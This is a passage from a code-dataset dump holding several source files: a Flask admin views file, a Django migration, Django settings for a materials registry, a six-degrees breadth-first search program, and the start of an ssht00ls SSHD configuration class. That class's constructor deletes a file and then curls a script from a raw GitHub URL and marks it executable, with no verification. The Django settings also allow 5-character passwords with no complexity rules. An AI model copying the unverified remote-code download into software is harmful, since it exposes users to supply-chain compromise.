redirect(url_for('admin.list_roles'))\n\n\n@admin.route('/employees')\n@login_required\ndef list_employees():\n    \"\"\"\n    list all employees\n    \"\"\"\n    check_admin()\n    employees = Employee.query.all()\n    return render_template('list_employees.html', employees=employees, title='Employees')\n\n@admin.route('/employee/assign/<int:id>', methods=['GET','POST'])\n@login_required\ndef assign_employee(id):\n    \"\"\"\n    assign a department and role to an employee\n    \"\"\"\n    check_admin()\n    employee = Employee.query.get_or_404(id)\n    if employee.is_admin:\n        abort(403)\n\n    form = EmployeeAssignForm(obj=employee)\n    if form.validate_on_submit():\n        employee.department = form.department.data\n        employee.role = form.role.data\n        db.session.add(employee)\n        db.session.commit()\n\n        flash('You have successfully assigned a department and role to the employee')\n        return redirect(url_for('admin.list_employees'))\n    return render_template('employee.html', employee=employee, form=form, title='Assign Employee')","sub_path":"app/admin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"496930533","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n    dependencies = [\n        ('CRM', '0010_auto_20160521_1410'),\n    ]\n\n    operations = [\n        migrations.AlterField(\n            model_name='appointment',\n            name='record',\n            field=models.OneToOneField(related_name='appointments', null=True,\n                                       verbose_name=b'\\xe5\\x92\\xa8\\xe8\\xaf\\xa2\\xe8\\xae\\xb0\\xe5\\xbd\\x95',\n                                       to='CRM.Record'),\n        ),\n    ]\n","sub_path":"CRM/migrations/0011_auto_20160521_1411.py","file_name":"0011_auto_20160521_1411.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"137202724","text":"\"\"\"\nDjango settings for the nmrr project.\n\nFor more information on this file, 
see\nhttps://docs.djangoproject.com/en/2.2/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/2.2/ref/settings/\n\"\"\"\nimport os\n\nfrom core_main_app.utils.logger.logger_utils import (\n set_generic_handler,\n set_generic_logger,\n update_logger_with_local_app,\n)\nfrom mongoengine.connection import connect\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = False\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = os.environ[\"DJANGO_SECRET_KEY\"]\n# SECURITY WARNING: only list host/domain names that this Django site can serve\nALLOWED_HOSTS = os.environ[\"ALLOWED_HOSTS\"].split(\",\") if \"ALLOWED_HOSTS\" in os.environ else []\n# SERVER URI\nSERVER_URI = os.environ[\"SERVER_URI\"]\n\n# Databases\n\nDATABASES = {\n \"default\": {\n \"ENGINE\": \"django.db.backends.postgresql_psycopg2\",\n \"HOST\": os.environ[\"POSTGRES_HOST\"] if \"POSTGRES_HOST\" in os.environ else None,\n \"PORT\": int(os.environ[\"POSTGRES_PORT\"]) if \"POSTGRES_PORT\" in os.environ else 5432,\n \"NAME\": os.environ[\"POSTGRES_DB\"] if \"POSTGRES_DB\" in os.environ else None,\n \"USER\": os.environ[\"POSTGRES_USER\"] if \"POSTGRES_USER\" in os.environ else None,\n \"PASSWORD\": os.environ[\"POSTGRES_PASS\"] if \"POSTGRES_PASS\" in os.environ else None,\n }\n}\n\nMONGO_HOST = os.environ[\"MONGO_HOST\"] if \"MONGO_HOST\" in os.environ else \"\"\nMONGO_PORT = os.environ[\"MONGO_PORT\"] if \"MONGO_PORT\" in os.environ else \"27017\"\nMONGO_DB = os.environ[\"MONGO_DB\"] if \"MONGO_DB\" in os.environ else \"\"\nMONGO_USER = os.environ[\"MONGO_USER\"] if \"MONGO_USER\" in os.environ else \"\"\nMONGO_PASS = os.environ[\"MONGO_PASS\"] if \"MONGO_PASS\" in os.environ else \"\"\nMONGODB_URI = (\n f\"mongodb://{MONGO_USER}:{MONGO_PASS}@{MONGO_HOST}:{MONGO_PORT}/{MONGO_DB}\"\n)\nconnect(MONGO_DB, host=MONGODB_URI)\n\n\nBROKER_TRANSPORT_OPTIONS = {\n \"visibility_timeout\": 3600,\n \"fanout_prefix\": True,\n \"fanout_patterns\": True,\n}\nREDIS_HOST = os.environ[\"REDIS_HOST\"] if \"REDIS_HOST\" in os.environ else \"\"\nREDIS_PORT = os.environ[\"REDIS_PORT\"] if \"REDIS_PORT\" in os.environ else \"6379\"\nREDIS_PASS = os.environ[\"REDIS_PASS\"] if \"REDIS_PASS\" in os.environ else None\nREDIS_URL = f\"redis://:{REDIS_PASS}@{REDIS_HOST}:{REDIS_PORT}\"\n\nBROKER_URL = REDIS_URL\nCELERY_RESULT_BACKEND = REDIS_URL\n\n# Label customization\nWEBSITE_SHORT_TITLE = \"NMRR\"\nCUSTOM_DATA = \"Materials Data\"\nCUSTOM_NAME = os.environ[\"SERVER_NAME\"]\nCUSTOM_TITLE = \"Materials Resource Registry\"\nCUSTOM_SUBTITLE = \"Part of the Materials Genome Initiative\"\nCURATE_MENU_NAME = \"Publish resource\"\nEXPLORE_MENU_NAME = \"Search for resources\"\nWEBSITE_ADMIN_COLOR = \"blue\"\n# black, black-light, blue, blue-light, green, green-light, purple, purple-light, red, red-light, yellow, yellow-light\n\nif SERVER_URI.lower().startswith(\"https\"):\n # Activate HTTPS\n os.environ[\"HTTPS\"] = \"on\"\n\n # Secure cookies\n CSRF_COOKIE_SECURE = True\n CSRF_COOKIE_AGE = None\n SESSION_COOKIE_SECURE = True\n SESSION_EXPIRE_AT_BROWSER_CLOSE = True\n SESSION_COOKIE_AGE = 604800\n\n # Set x-frame options\n X_FRAME_OPTIONS = \"SAMEORIGIN\"\n\n# Application definition\nINSTALLED_APPS = (\n \"django.contrib.admin\",\n \"django.contrib.auth\",\n \"django.contrib.contenttypes\",\n \"django.contrib.sessions\",\n \"django.contrib.messages\",\n \"django.contrib.sites\",\n \"django.contrib.staticfiles\",\n # Extra apps\n \"rest_framework\",\n 
\"drf_yasg\",\n \"rest_framework_mongoengine\",\n \"menu\",\n \"tz_detect\",\n \"defender\",\n \"captcha\",\n # Core apps\n \"core_main_app\",\n \"core_main_registry_app\",\n \"core_website_app\",\n \"core_oaipmh_common_app\",\n \"core_oaipmh_harvester_app\",\n \"core_oaipmh_provider_app\",\n \"core_curate_registry_app\",\n \"core_curate_app\",\n \"core_parser_app\",\n \"core_parser_app.tools.modules\", # FIXME: make modules an app\n \"core_parser_app.tools.parser\", # FIXME: make parser an app\n \"core_explore_keyword_registry_app\", # /!\\ Should always be before core_explore_common_app\n \"core_explore_keyword_app\",\n \"core_explore_common_app\",\n \"core_explore_oaipmh_app\",\n \"core_dashboard_registry_app\",\n \"core_dashboard_common_app\",\n \"mptt\",\n \"core_linked_records_app\",\n # Modules\n \"core_module_local_id_registry_app\",\n \"core_module_status_registry_app\",\n \"core_module_fancy_tree_registry_app\",\n \"core_module_text_area_app\",\n # Local apps\n \"nmrr_home\",\n)\nMIDDLEWARE = (\n \"django.contrib.sessions.middleware.SessionMiddleware\",\n \"django.middleware.locale.LocaleMiddleware\",\n \"django.middleware.common.CommonMiddleware\",\n \"django.middleware.csrf.CsrfViewMiddleware\",\n \"django.contrib.auth.middleware.AuthenticationMiddleware\",\n \"defender.middleware.FailedLoginMiddleware\",\n \"django.contrib.messages.middleware.MessageMiddleware\",\n \"django.middleware.clickjacking.XFrameOptionsMiddleware\",\n \"django.middleware.security.SecurityMiddleware\",\n \"tz_detect.middleware.TimezoneMiddleware\",\n)\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nROOT_URLCONF = \"nmrr.urls\"\n\nTEMPLATES = [\n {\n \"BACKEND\": \"django.template.backends.django.DjangoTemplates\",\n \"DIRS\": [\"templates\"],\n \"APP_DIRS\": True,\n \"OPTIONS\": {\n \"context_processors\": [\n \"django.template.context_processors.debug\",\n \"django.template.context_processors.request\",\n \"django.contrib.auth.context_processors.auth\",\n \"django.contrib.messages.context_processors.messages\",\n \"core_main_app.utils.custom_context_processors.domain_context_processor\", # Needed by any curator app\n \"django.template.context_processors.i18n\",\n ],\n },\n },\n]\n\nWSGI_APPLICATION = \"nmrr.wsgi.application\"\n\n# Internationalization\n# https://docs.djangoproject.com/en/2.2/topics/i18n/\n\nLANGUAGE_CODE = \"en-us\"\n\nTIME_ZONE = \"UTC\"\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\nLOCALE_PATHS = (os.path.join(BASE_DIR, \"locale\"),)\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/2.2/howto/static-files/\n\nSTATIC_URL = \"/static/\"\nSTATIC_ROOT = \"static.prod\"\n\nSTATICFILES_FINDERS = (\n \"django.contrib.staticfiles.finders.AppDirectoriesFinder\",\n \"django.contrib.staticfiles.finders.FileSystemFinder\",\n)\n\nSTATICFILES_DIRS = (\"static\",)\n\n# Logging\nLOGGING_SERVER = True\nLOGGING_CLIENT = True\nLOGGING_DB = True\n\nLOGGER_FILE_SERVER = os.path.join(BASE_DIR, \"logfile_server.txt\")\nLOGGER_FILE_CLIENT = os.path.join(BASE_DIR, \"logfile_client.txt\")\nLOGGER_FILE_DB = os.path.join(BASE_DIR, \"logfile_db.txt\")\nLOGGER_FILE_SECURITY = os.path.join(BASE_DIR, \"logfile_security.txt\")\nLOGGER_FILE_APP = os.path.join(BASE_DIR, \"logfile_app.txt\")\n\nLOGGER_LEVEL = os.getenv(\"DJANGO_LOG_LEVEL\", \"DEBUG\")\nLOGGER_CLIENT_LEVEL = os.getenv(\"DJANGO_LOG_LEVEL\", \"DEBUG\")\nLOGGER_SERVER_LEVEL = os.getenv(\"DJANGO_LOG_LEVEL\", \"DEBUG\")\nLOGGER_DB_LEVEL = os.getenv(\"DJANGO_LOG_LEVEL\", 
\"DEBUG\")\nLOGGER_APP_LEVEL = os.getenv(\"DJANGO_LOG_LEVEL\", \"DEBUG\")\n\nLOGGER_MAX_BYTES = 500000\nLOGGER_BACKUP_COUNT = 2\n\nlocal_logger_conf = {\n \"handlers\": [\"app_handler\", \"console\"],\n \"level\": LOGGER_APP_LEVEL,\n}\n\nLOGGING = {\n \"version\": 1,\n \"disable_existing_loggers\": False,\n \"formatters\": {\n \"fmt-default\": {\n \"format\": \"%(levelname)s: %(asctime)s\\t%(name)s\\t%(pathname)s\\tl.%(lineno)s\\t%(message)s\",\n \"datefmt\": \"%Y-%m-%d %H:%M:%S\",\n },\n },\n \"handlers\": {\n \"logfile-security\": {\n \"level\": \"DEBUG\",\n \"class\": \"logging.handlers.RotatingFileHandler\",\n \"filename\": LOGGER_FILE_SECURITY,\n \"maxBytes\": LOGGER_MAX_BYTES,\n \"backupCount\": LOGGER_BACKUP_COUNT,\n \"formatter\": \"fmt-default\",\n },\n \"console\": {\n \"level\": \"INFO\",\n \"class\": \"logging.StreamHandler\",\n \"formatter\": \"fmt-default\",\n },\n \"app_handler\": {\n \"level\": LOGGER_APP_LEVEL,\n \"class\": \"logging.handlers.RotatingFileHandler\",\n \"filename\": LOGGER_FILE_APP,\n \"maxBytes\": LOGGER_MAX_BYTES,\n \"backupCount\": LOGGER_BACKUP_COUNT,\n \"formatter\": \"fmt-default\",\n },\n },\n \"loggers\": {\n \"django.security\": {\n \"handlers\": [\"console\", \"logfile-security\"],\n \"level\": LOGGER_LEVEL,\n \"propagate\": True,\n },\n },\n}\n\nupdate_logger_with_local_app(LOGGING, local_logger_conf, INSTALLED_APPS)\n\nif LOGGING_CLIENT:\n set_generic_handler(\n LOGGING,\n \"logfile-template\",\n LOGGER_CLIENT_LEVEL,\n LOGGER_FILE_CLIENT,\n LOGGER_MAX_BYTES,\n LOGGER_BACKUP_COUNT,\n \"logging.handlers.RotatingFileHandler\",\n )\n set_generic_logger(\n LOGGING, \"django.template\", LOGGER_CLIENT_LEVEL, [\"console\", \"logfile-template\"]\n )\n set_generic_handler(\n LOGGING,\n \"logfile-request\",\n LOGGER_CLIENT_LEVEL,\n LOGGER_FILE_CLIENT,\n LOGGER_MAX_BYTES,\n LOGGER_BACKUP_COUNT,\n \"logging.handlers.RotatingFileHandler\",\n )\n set_generic_logger(\n LOGGING, \"django.request\", LOGGER_CLIENT_LEVEL, [\"console\", \"logfile-request\"]\n )\n\nif LOGGING_SERVER:\n set_generic_handler(\n LOGGING,\n \"logfile-server\",\n LOGGER_SERVER_LEVEL,\n LOGGER_FILE_SERVER,\n LOGGER_MAX_BYTES,\n LOGGER_BACKUP_COUNT,\n \"logging.handlers.RotatingFileHandler\",\n )\n set_generic_logger(\n LOGGING, \"django.server\", LOGGER_SERVER_LEVEL, [\"console\", \"logfile-server\"]\n )\n\nif LOGGING_DB:\n set_generic_handler(\n LOGGING,\n \"logfile-django-db-backend\",\n LOGGER_DB_LEVEL,\n LOGGER_FILE_DB,\n LOGGER_MAX_BYTES,\n LOGGER_BACKUP_COUNT,\n \"logging.handlers.RotatingFileHandler\",\n )\n set_generic_logger(\n LOGGING,\n \"django.db.backends\",\n LOGGER_DB_LEVEL,\n [\"console\", \"logfile-django-db-backend\"],\n )\n\n# Password settings for django.contrib.auth validators\n# Specifies the minimum length for passwords.\nPASSWORD_MIN_LENGTH = 5\n# Specifies the minimum amount of required letters in a password.\nPASSWORD_MIN_LETTERS = 0\n# Specifies the minimum amount of required uppercase letters in a password.\nPASSWORD_MIN_UPPERCASE_LETTERS = 0\n# Specifies the minimum amount of required lowercase letters in a password.\nPASSWORD_MIN_LOWERCASE_LETTERS = 0\n# Specifies the minimum amount of required numbers in a password.\nPASSWORD_MIN_NUMBERS = 0\n# Specifies the minimum amount of required symbols in a password.\nPASSWORD_MIN_SYMBOLS = 0\n# Specifies the maximum amount of consecutive characters allowed in passwords.\nPASSWORD_MAX_OCCURRENCE = None\n\nMENU_SELECT_PARENTS = False\n\"\"\" boolean: Control if parent menu items should automatically have their selected 
property set to True if one of \ntheir children has its selected property set to True\n\"\"\"\n\nDATA_SOURCES_EXPLORE_APPS = [\"core_explore_oaipmh_app\"]\n\"\"\" List of data sources for the exploration apps\n\"\"\"\n\nSWAGGER_SETTINGS = {\n \"exclude_namespaces\": [], # List URL namespaces to ignore\n \"api_version\": \"1.1\", # Specify your API's version\n \"api_path\": \"/\", # Specify the path to your API not a root level\n \"enabled_methods\": [ # Specify which methods to enable in Swagger UI\n \"get\",\n \"post\",\n \"put\",\n \"patch\",\n \"delete\",\n ],\n \"api_key\": \"\", # An API key\n \"is_authenticated\": False, # Set to True to enforce user authentication,\n \"is_superuser\": False, # Set to True to enforce admin only access\n \"LOGIN_URL\": \"core_main_app_login\",\n \"LOGOUT_URL\": \"core_main_app_logout\",\n}\n\nREST_FRAMEWORK = {\n \"DEFAULT_AUTHENTICATION_CLASSES\": (\n \"rest_framework.authentication.BasicAuthentication\",\n \"rest_framework.authentication.SessionAuthentication\",\n ),\n}\n\n# Registry configuration\nREGISTRY_XSD_FILENAME = \"res-md.xsd\"\n\"\"\" str: Registry xsd filename used for the initialisation.\n\"\"\"\n\n# If you want to use your own schema, set your schema here\nREGISTRY_XSD_FILEPATH = os.path.join(\"xsd\", REGISTRY_XSD_FILENAME)\n\"\"\" str: Registry xsd path used for the initialisation.\n\"\"\"\n\n# If you want to use your own configuration file, set your configuration file here\nCUSTOM_REGISTRY_FILE_PATH = os.path.join(\"json\", \"custom_registry.json\")\n\"\"\" str: Custom registry configuration file path used for the initialisation.\n\"\"\"\n\nDEFAULT_DATA_RENDERING_XSLT = os.path.join(\n \"core_main_registry_app\", \"xsl\", \"xml2html.xsl\"\n)\n\nPARSER_DOWNLOAD_DEPENDENCIES = True\n\"\"\" boolean: Should the XSD parser download dependencies\n\"\"\"\n\nEXPLORE_ADD_DEFAULT_LOCAL_DATA_SOURCE_TO_QUERY = True\n\"\"\" boolean: Do we add the local data source to new queries by default\n\"\"\"\n\nSSL_CERTIFICATES_DIR = True\n\"\"\" boolean: Control whether requests verify the server's TLS certificate\n string: Path to a CA bundle\n\"\"\"\n\nVERIFY_DATA_ACCESS = False\n\"\"\" :py:class:`bool`: Additional checks that data returned by a query can be accessed (slow).\n\"\"\"\n\nDISPLAY_EDIT_BUTTON = False\n\"\"\" boolean: Display the edit button on the result page\n\"\"\"\n\nDATA_SORTING_FIELDS = [\"-last_modification_date\"]\n\"\"\" Array: Default sort fields for the data query. \n\"\"\"\n\nDATA_DISPLAYED_SORTING_FIELDS = [\n {\n \"field\": \"last_modification_date\",\n \"display\": \"Last updated\",\n \"ordering\": \"-last_modification_date\",\n },\n {\n \"field\": \"last_modification_date\",\n \"display\": \"First updated\",\n \"ordering\": \"+last_modification_date\",\n },\n {\"field\": \"title\", \"display\": \"Title (A-Z)\", \"ordering\": \"+title\"},\n {\"field\": \"title\", \"display\": \"Title (Z-A)\", \"ordering\": \"-title\"},\n]\n\"\"\"The default sorting fields displayed on the GUI, Data model field Array\"\"\"\n\nSORTING_DISPLAY_TYPE = \"single\"\n\"\"\"Result sorting graphical display type ('multi' / 'single')\"\"\"\n\nDEFAULT_DATE_TOGGLE_VALUE = False\n\"\"\" boolean: Set the toggle default value in the records list\n\"\"\"\n\n# Configure Django Defender\nDEFENDER_REDIS_URL = REDIS_URL\n\"\"\" :py:class:`str`: The Redis url for defender. 
\n\"\"\"\nDEFENDER_COOLOFF_TIME = 60\n\"\"\" integer: Period of inactivity after which old failed login attempts will be forgotten\n\"\"\"\nDEFENDER_LOGIN_FAILURE_LIMIT = 3\n\"\"\" integer: The number of login attempts allowed before a record is created for the failed login.\n\"\"\"\nDEFENDER_STORE_ACCESS_ATTEMPTS = True\n\"\"\" boolean: Store the login attempt to the database.\n\"\"\"\nDEFENDER_USE_CELERY = True\n\"\"\" boolean: Use Celery to store the login attempt to the database.\n\"\"\"\nDEFENDER_LOCKOUT_URL = \"/locked\"\n\"\"\" string: url to the defender error page (defined in core_main_registry_app)\n\"\"\"\nDISPLAY_PRIVACY_POLICY_FOOTER = True\n\"\"\" boolean: display the privacy policy link in the footer\n\"\"\"\nDISPLAY_TERMS_OF_USE_FOOTER = True\n\"\"\" boolean: display the terms of use link in the footer\n\"\"\"\nDISPLAY_CONTACT_FOOTER = True\n\"\"\" boolean: display the contact link in the footer\n\"\"\"\nDISPLAY_HELP_FOOTER = True\n\"\"\" boolean: display the help link in the footer\n\"\"\"\nDISPLAY_RULES_OF_BEHAVIOR_FOOTER = True\n\"\"\" boolean: display the rules of behavior link in the footer\n\"\"\"\n\nAUTO_SET_PID = True\n\"\"\" boolean: enable the automatic pid generation for saved data.\n\"\"\"\n\nID_PROVIDER_SYSTEMS = {\n \"local\": {\n \"class\": \"core_linked_records_app.utils.providers.local.LocalIdProvider\",\n \"args\": [],\n },\n}\n\"\"\" dict: provider systems available for registering PIDs\n\"\"\"\n\nID_PROVIDER_PREFIXES = [\"cdcs\"]\n\"\"\" list: accepted prefixes if manually specifying PIDs (first item is the\ndefault prefix)\n\"\"\"\n\nPID_XPATH = \"Resource.@localid\"\n\"\"\" string: location of the PID in the document, specified as dot notation\n\"\"\"\n\nCAN_SET_WORKSPACE_PUBLIC = False\n\"\"\" boolean: Can make a private workspace public\n\"\"\"\n\nCAN_SET_PUBLIC_DATA_TO_PRIVATE = False\n\"\"\" boolean: Can public data be made private\n\"\"\"\n\nCAN_ANONYMOUS_ACCESS_PUBLIC_DOCUMENT = True\n\"\"\" boolean: Can anonymous users access public data\n\"\"\"\n","sub_path":"deploy/cdcs/nmrr.settings.py","file_name":"nmrr.settings.py","file_ext":"py","file_size_in_byte":16059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"277973791","text":"import csv\nimport sys\nimport math\n\nfrom util import Node, StackFrontier, QueueFrontier\n\n# Maps names to a set of corresponding person_ids\nnames = {}\n\n# Maps person_ids to a dictionary of: name, birth, movies (a set of movie_ids)\npeople = {}\n\n# Maps movie_ids to a dictionary of: title, year, stars (a set of person_ids)\nmovies = {}\n\n\ndef load_data(directory):\n \"\"\"\n Load data from CSV files into memory.\n \"\"\"\n # Load people\n with open(f\"{directory}/people.csv\", encoding=\"utf-8\") as f:\n reader = csv.DictReader(f)\n for row in reader:\n people[row[\"id\"]] = {\n \"name\": row[\"name\"],\n \"birth\": row[\"birth\"],\n \"movies\": set()\n }\n if row[\"name\"].lower() not in names:\n names[row[\"name\"].lower()] = {row[\"id\"]}\n else:\n names[row[\"name\"].lower()].add(row[\"id\"])\n\n # Load movies\n with open(f\"{directory}/movies.csv\", encoding=\"utf-8\") as f:\n reader = csv.DictReader(f)\n for row in reader:\n movies[row[\"id\"]] = {\n \"title\": row[\"title\"],\n \"year\": row[\"year\"],\n \"stars\": set()\n }\n\n # Load stars\n with open(f\"{directory}/stars.csv\", encoding=\"utf-8\") as f:\n reader = csv.DictReader(f)\n for row in reader:\n try:\n people[row[\"person_id\"]][\"movies\"].add(row[\"movie_id\"])\n 
movies[row[\"movie_id\"]][\"stars\"].add(row[\"person_id\"])\n except KeyError:\n pass\n\n\ndef main():\n if len(sys.argv) > 2:\n sys.exit(\"Usage: python degrees.py [directory]\")\n directory = sys.argv[1] if len(sys.argv) == 2 else \"large\"\n\n # Load data from files into memory\n print(\"Loading data...\")\n load_data(directory)\n print(\"Data loaded.\")\n\n source = person_id_for_name(input(\"Name: \"))\n if source is None:\n sys.exit(\"Person not found.\")\n target = person_id_for_name(input(\"Name: \"))\n if target is None:\n sys.exit(\"Person not found.\")\n\n path = shortest_path(source, target)\n\n if path is None:\n print(\"Not connected.\")\n else:\n degrees = len(path)\n print(f\"{degrees} degrees of separation.\")\n path = [(None, source)] + path\n for i in range(degrees):\n person1 = people[path[i][1]][\"name\"]\n person2 = people[path[i + 1][1]][\"name\"]\n movie = movies[path[i + 1][0]][\"title\"]\n print(f\"{i + 1}: {person1} and {person2} starred in {movie}\")\n\n\ndef check_if_goal(node, target):\n \"\"\"\n Checks if current node is the target node\n if so returns a Path of actions to that node\n if not returns None\n \"\"\"\n\n # If this is the target we seek\n # Add the path to target to solutions list\n if node.state == target:\n path = []\n targetNode = node\n while targetNode.parent is not None:\n path.append(targetNode.action)\n targetNode = targetNode.parent\n path.reverse()\n return path\n return None\n\n\ndef shortest_path(source, target):\n \"\"\"\n Returns the shortest list of (movie_id, person_id) pairs\n that connect the source to the target.\n\n If no possible path, returns None.\n \"\"\"\n\n # Set source as root node\n start = Node(state=source, parent=None, action=None)\n\n # Initialize frontier with a Queue.\n # We use breadth-first search and hence a queue to ensure\n # that we find the most optimal (shortest) solution\n\n frontier = QueueFrontier()\n\n # Set of visited nodes\n explored_people = set()\n\n # Check if start is target\n goal = check_if_goal(start, target)\n\n # If start is target, end search\n if goal is not None:\n return goal\n\n # Add root node to frontier\n frontier.add(start)\n\n # Repeat until frontier is empty\n while True:\n if frontier.empty():\n break\n # Get the first node in the queue\n node = frontier.remove()\n\n # Mark the current node as explored by adding it to explored set\n explored_people.add(node.state)\n\n # Add node's neighbors to frontier\n for movie, person in neighbors_for_person(node.state):\n if not frontier.contains_state(\n person) and person not in explored_people:\n child = Node(state=person, parent=node, action=(movie, person))\n path = check_if_goal(child, target)\n if path is not None:\n return path\n else:\n frontier.add(child)\n return None\n\n\ndef person_id_for_name(name):\n \"\"\"\n Returns the IMDB id for a person's name,\n resolving ambiguities as needed.\n \"\"\"\n person_ids = list(names.get(name.lower(), set()))\n if len(person_ids) == 0:\n return None\n elif len(person_ids) > 1:\n print(f\"Which '{name}'?\")\n for person_id in person_ids:\n person = people[person_id]\n name = person[\"name\"]\n birth = person[\"birth\"]\n print(f\"ID: {person_id}, Name: {name}, Birth: {birth}\")\n try:\n person_id = input(\"Intended Person ID: \")\n if person_id in person_ids:\n return person_id\n except ValueError:\n pass\n return None\n else:\n return person_ids[0]\n\n\ndef neighbors_for_person(person_id):\n \"\"\"\n Returns (movie_id, person_id) pairs for people\n who starred with a given person.\n \"\"\"\n 
movie_ids = people[person_id][\"movies\"]\n neighbors = set()\n for movie_id in movie_ids:\n for person_id in movies[movie_id][\"stars\"]:\n neighbors.add((movie_id, person_id))\n return neighbors\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"week 0/projects/degrees/degrees.py","file_name":"degrees.py","file_ext":"py","file_size_in_byte":5742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"503539090","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# imports.\nfrom ssht00ls.classes.config import *\nfrom ssht00ls.classes import utils\nfrom ssht00ls.classes.smartcards import smartcards\nfrom ssht00ls.classes.installation import installation\n\n# the sshd object class.\nclass SSHD(object):\n\tdef __init__(self):\n\t\t\n\t\t# check downloads.\n\t\tif CHECKS:\n\t\t\tutils_lib = gfp.clean(path=f\"{SOURCE_PATH}/classes/utils/\")\n\t\t\tfor subpath, url in [\n\t\t\t\t[\"handler\", \"https://raw.githubusercontent.com/vandenberghinc/ssht00ls/master/ssht00ls/classes/utils/handler\"],\n\t\t\t]:\n\t\t\t\tfull_path = gfp.clean(f\"{utils_lib}/{subpath}\")\n\t\t\t\tos.system(f\"rm -fr {full_path}\")\n\t\t\t\tos.system(f\"curl -s {url} -o {full_path} && chmod +x {full_path}\")\n\t\t\t\tif not os.path.exists(full_path):\n\t\t\t\t\traise exceptions.ModuleError(\"Failed to install the ssht00ls utils (#1).\")\n\n\tdef create(self,\n\t\t# save the configuration & banner.\n\t\tsave=False,\n\t\t# the ssh port.\n\t\tport=22,\n\t\t# the listen addresses.\n\t\tlisten_addresses=[],\n\t\t# the server's banner.\n\t\tbanner=\"Hello World!\",\n\t\t# the allowed users & options.\n\t\tusers={\n\t\t\t# define per user (all keys are optional).\n\t\t\t\"administrator\": {\n\t\t\t\t# the user's root permissions.\n\t\t\t\t\"root_permissions\":False,\n\t\t\t\t# authentication by password.\n\t\t\t\t\"password_authentication\":False,\n\t\t\t\t# authentication by keys.\n\t\t\t\t\"key_authentication\":True,\n\t\t\t\t# ip filter.\n\t\t\t\t\"ip_filter\":False,\n\t\t\t\t\"allowed_ips\":[],\n\t\t\t\t# sftp server only.\n\t\t\t\t\"sftp_only\":False,\n\t\t\t\t# the chroot directory (leave null to disable).\n\t\t\t\t\"chroot_directory\":None,\n\t\t\t\t# allowed connection options.\n\t\t\t\t\"x11_forwarding\":False,\n\t\t\t\t\"tcp_forwarding\":False,\n\t\t\t\t\"permit_tunnel\":False,\n\t\t\t\t\"allow_stream_local_forwarding\":False,\n\t\t\t\t\"gateway_ports\":False,\n\t\t\t},\n\t\t},\n\t):\n\n\t\t# check users.\n\t\tresponse = self.__check_user_items__(users)\n\t\tif response[\"error\"] != None: return response\n\n\t\t# check utils intalled (must be before __install_banner__).\n\t\tresponse = self.__check_utils_installed__(list(users.keys()))\n\t\tif response[\"error\"] != None: return response\n\n\t\t# intall banner.\n\t\tif save:\n\t\t\tresponse = self.__install_banner__(banner=banner, usernames=list(users.keys()))\n\t\t\tif response[\"error\"] != None: return response\n\n\t\t# defaults.\n\t\tconfiguration = '# SSHD_CONFIG:'\n\t\tconfiguration += '\\n# BY VANDENBERGHINC'\n\t\tconfiguration += '\\n# MODULE: ssht00ls'\n\t\tconfiguration += '\\n# AUTHOR: DAAN VAN DEN BERGH'\n\t\tconfiguration += '\\nAcceptEnv LANG LC_*'\n\t\tconfiguration += '\\nSubsystem sftp internal-sftp'\n\t\t#configuration += '\\nSubsystem sftp /usr/libexec/sftp-server'\n\t\tconfiguration += '\\nLoginGraceTime 60'\n\t\tconfiguration += '\\nMaxAuthTries 3'\n\t\tconfiguration += '\\nMaxSessions 10'\n\t\tconfiguration += \"\\nMaxStartups 999\"\n\t\tconfiguration += '\\nLogLevel 
VERBOSE'\n\t\tconfiguration += f'\\nPort {port}'\n\t\tconfiguration += '\\nProtocol 2'\n\n\t\t# defaults.\n\t\tconfiguration += '\\nPermitRootLogin {}'.format(\"no\")\n\t\tconfiguration += '\\nStrictModes {}'.format(\"yes\")\n\t\tconfiguration += '\\nPermitUserEnvironment {}'.format(\"no\")\n\t\tconfiguration += '\\nIgnoreRhosts {}'.format(\"yes\")\n\t\tconfiguration += '\\nPermitTunnel {}'.format(\"no\")\n\t\tconfiguration += '\\nX11Forwarding {}'.format(\"no\")\n\t\tconfiguration += '\\nAllowTcpForwarding {}'.format(\"no\")\n\t\tconfiguration += '\\nAllowStreamLocalForwarding {}'.format(\"no\")\n\t\tconfiguration += '\\nGatewayPorts {}'.format(\"no\")\n\t\tconfiguration += '\\nPermitTTY {}'.format(\"yes\")\n\t\tfor listen_address in listen_addresses:\n\t\t\tconfiguration += f'\\nListenAddress {listen_address}'\n\n\t\t# auth keys.\n\t\tconfiguration += '\\nAuthorizedKeysFile {}'.format(\".ssh/authorized_keys\")\n\n\t\t# banner.\n\t\tconfiguration += '\\nBanner .ssh/banner'\n\n\t\t# per users.\n\t\tconfiguration += '\\nChallengeResponseAuthentication no'\n\t\tfor username, info in users.items():\n\t\t\tconfiguration += f'\\n# User: {username}'\n\n\t\t\t# ip filter.\t\n\t\t\tconfiguration += f'\\nMatch User {username}'\n\n\t\t\t# authentication by password.\n\t\t\tif info[\"password_authentication\"]:\n\t\t\t\tconfiguration += '\\n PasswordAuthentication yes'\n\t\t\t\tconfiguration += '\\n PermitEmptyPasswords no'\n\t\t\telse:\n\t\t\t\tconfiguration += '\\n PasswordAuthentication no'\n\t\t\t\tconfiguration += '\\n PermitEmptyPasswords no'\n\n\t\t\t# authentication by keys.\n\t\t\tif info[\"key_authentication\"]:\n\t\t\t\tconfiguration += '\\n PubkeyAuthentication {}'.format('yes')\n\t\t\telse:\n\t\t\t\tconfiguration += '\\n PubkeyAuthentication {}'.format('no')\n\n\n\t\t\t# 